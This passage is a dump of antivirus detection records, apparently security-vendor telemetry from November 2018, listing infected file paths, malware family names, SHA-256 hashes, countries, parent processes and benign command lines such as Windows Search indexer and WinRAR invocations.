\\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:33:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Users\\X\\Downloads\\Programs\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T04:35:44Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='moduleautodeps.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\platform\\config\\ModuleAutoDeps\\ModuleAutoDeps.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2e6fc46b0f15043a5a96391e720402de6b60d7ab743e879c0df91b50569267cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-2.available\\Avira\\2E6FC46B0F15043A5A96391E720402DE6B60D7AB743E879C0DF91B50569267CD', filesize=204000, name='HTML/Infected.WebPage.Gen2.#M1.#R1'), hash='2e6fc46b0f15043a5a96391e720402de6b60d7ab743e879c0df91b50569267cd', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T06:04:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='source.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\SOURCE\\SOURCE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194520-2c875409', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-192734-6E1A9BD8\\AVSCAN-20181102-194520-2C875409', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:45:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='images.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\jre\\lib\\images\\images.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='s0017mdfl.dll', filepath='C:\\Users\\X\\Documents\\MeMu\\Programas\\FALCON BOX full 2018 .By Robert Aguilar\\Bin\\s0017mdfl.dll', filesize=4992000, name='DR/Delphi.Gen.#M300.#R491'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T11:14:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151424-91e167a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-151424-91E167A4', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T09:46:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='inlineall.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\samples\\assets\\inlineall\\inlineall.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:28:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135146-6d8275f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b70d204\\AVSCAN-20181102-135034-6296D67B\\AVSCAN-20181102-135146-6D8275F0', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7867A1B7-AB4F-4FAF-8BE8-E64B0D8AA5B0}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='21e07b31f103951d4648e184e7fbb717f1f0d6d41d7e45fb361438819bc14bb3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160046-f2432d4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160046-F2432D4E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:59:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:44:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155915-e8674195', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155915-E8674195', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001e076', filepath='C:\\Windows\\Temp\\5f1f5a26-64d4-4ede-8d54-7fccfe113629\\tmp00000160\\tmp0001e076', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T09:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085221-84c782e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72c1806\\AVSCAN-20181102-085205-81730C3A\\AVSCAN-20181102-085221-84C782E0', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0115436.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0115436.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134348-92703678', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134348-92703678', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134408-95b7feda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134408-95B7FEDA', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A78CBB83F36F008D550E3FE037743FB216180CCC39EE2BCBB137DF15C51B34B', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:23:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxpayne.exe', filepath='E:\\العاب\\العاب الوكيل\\4x4\\4\\New Briefcase\\Max Payne\\MaxPayne.exe', filesize=5120000, name='W32/Sality.AT.#M1.#R1'), hash='45919ef2bbec79687f66a6827276be60fdd4fb2cf45eb913f23209cfb256f9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T18:31:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvdxrjcm.exe', filepath='F:\\RECYCLER\\S-7-4-07-3262740328-8645573582-664574467-6068\\FvdXRJcM.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07b87ade61aa3f13cba28a0c3adb65ae54116d76148b3fc9252519fea4a8d47d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T10:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211603-19c0736e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e83dc89\\AVSCAN-20181102-211553-1891F42A\\AVSCAN-20181102-211603-19C0736E', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\05FC403CFE21604B31AD3A635209320126C73C7986BA605C8D8F081B0CBC781E', filesize=180000, name='W32/Elkern.B.#M1.#R1'), hash='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:49:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0124810.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0124810.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tokens.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\tokens\\tokens.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3e3315421731c5549874b9fca28e65ca66b309974bd50796ee9da6a19af20b4d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3E3315421731C5549874B9FCA28E65CA66B309974BD50796EE9DA6A19AF20B4D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3e3315421731c5549874b9fca28e65ca66b309974bd50796ee9da6a19af20b4d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:01:28Z'), dt=datetime.date(2018, 11, 2)),
